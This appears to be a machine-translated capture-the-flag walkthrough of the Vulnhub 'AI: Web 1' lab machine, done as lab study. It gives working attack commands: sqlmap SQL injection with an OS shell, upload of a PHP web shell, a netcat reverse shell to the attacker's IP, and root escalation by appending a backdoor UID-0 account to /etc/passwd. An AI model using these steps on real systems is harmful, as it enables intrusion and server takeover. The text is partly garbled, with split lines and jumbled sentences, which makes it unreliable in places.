Detailed explanation of Vulnhub target machine Web1 penetration test
Vulnhub target drone introduction:
Vulnhub is a comprehensive shooting range that provides various vulnerability platforms. You can download a variety of virtual machines for download. The local VM can be opened, and you can complete penetration testing, privilege escalation, vulnerability exploitation, code auditing and other interesting actual combat like a game.
This is a Web vulnerability target machine, as usual, you need to find the flag.
Vulnhub target drone download:
Official website address: https://www.vulnhub.com/entry/ai-web-1,353/
Vulnhub target machine installation:
After downloading, unzip the installation package and try VMware.
Detailed explanation of Vulnhub target drone vulnerability:
①: Information collection:
Use the netdiscover
discovery host in kali to
penetrate the machine: kali IP: 192.168.0.103 target machine IP: 192.168.0.104
Use the command:
nmap -sS -sV -A -n 192.168.0.104
Open the 80
port and visit it first to see "He said that Google can't find it." Go directly to the tool and scan the background: dirb http://192.168.0.104
the web crawler protocol was found. robots
Visit to find two directories /m3diNf0/
and access them /se3reTdir777/uploads/
in turn.
Accessing the first path is that the 403
page has no permission, and then accessing the second path does not have permission, and then use the command to scan again and dirb http://192.168.0.104/m3diNf0/
find the absolute path of the website, use the just dirb
scan another path and /se3reTdir777/uploads/
find oneindex.php
②: SQL injection:
It seems that there is sql
injection in the access. You can also use it to manually test it. sqlmap
Look at the fields first 1' order by 4#
. If there is an echo, it means that there is a sql injection vulnerability.
I am lazy and like to use it sqlmap
first to bp
grab a package to see the injected address:uid=1&Operation=Submit
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs #列出库
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables #列出表
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T user --columns #列出字段
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell #
Select php(default)
, custom location(s)
and then enter the path just obtained:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
Obtained shell
but with low permissionswww-data
③: File upload:
Now you need to write a sentence for the Trojan horse sqlmap
to create a new name under the path of the incoming server.hack.php
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./hack.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php
--file-write:去读取文件(hack.php)
--file-dest:后面加目标的绝对路径 已经生成木马的名称(hack.php)
Then visit http://192.168.0.104/se3reTdir777/uploads/hack.php
If it is blank, it means that the uploaded Trojan was successful! ! Connect directly to the WebSell
tool ant sword
④: Rebound shell:
1. Now kali
listen to the port usage command above: nc -lvvp 6666
2. nc -e /bin/bash 192.168.0.103 6666
(Found that the -e parameter is unavailable)
3. Use the command: rm /tmp/f;mkfifo/tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.103 6666 >/tmp/f
(bounced the shell)
4. Use the command: python -c "import pty;pty.spawn('/bin/bash')"
(python write interaction)
⑤: Elevation of rights:
First use the command: find / -user root -perm -4000 -print 2>/dev/null
look at which root
permissions can be executed
. Look at the kernel version. Use the command: uname -a
the current version number is. 4.15.0-58-generic
searchsploit linux kernel 4.15.0-58-generic
Search the relevant kernel vulnerabilities and find that there are no files that can be exploited.
It is found that DC-9
the same as the escalation method of , you can use adding an root
account to log in to escalate privileges. Please refer to the following link:
After reading this article, I will teach you to play the penetration test target machine vulnhub-DC9
Use the command: openssl passwd -1 -salt hacker 123456
create an admin account
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd
⑥: Get flag:
At this point, the flag has been obtained, and the penetration test is over.
Vulnhub target penetration summary:
The new knowledge point here is ( sql--os--shell
the first time I use this)
and the format of . If /etc/passwd
you don’t understand it, it’s best to escalate the right one step. It is easy to make mistakes . Save it in a file . Allowing login is prohibiting shell login .)用户名:密码:UID(用户ID):GID(组ID):描述性信息:主目录:默认Shell
"x"
/etc/shadow
shell
/bin/bash
/sbin/nologin
This time is a study of a web target drone. I hope you can also learn some new knowledge points and some penetration testing ideas. The final creation is not easy. Hope it will be helpful to everyone! !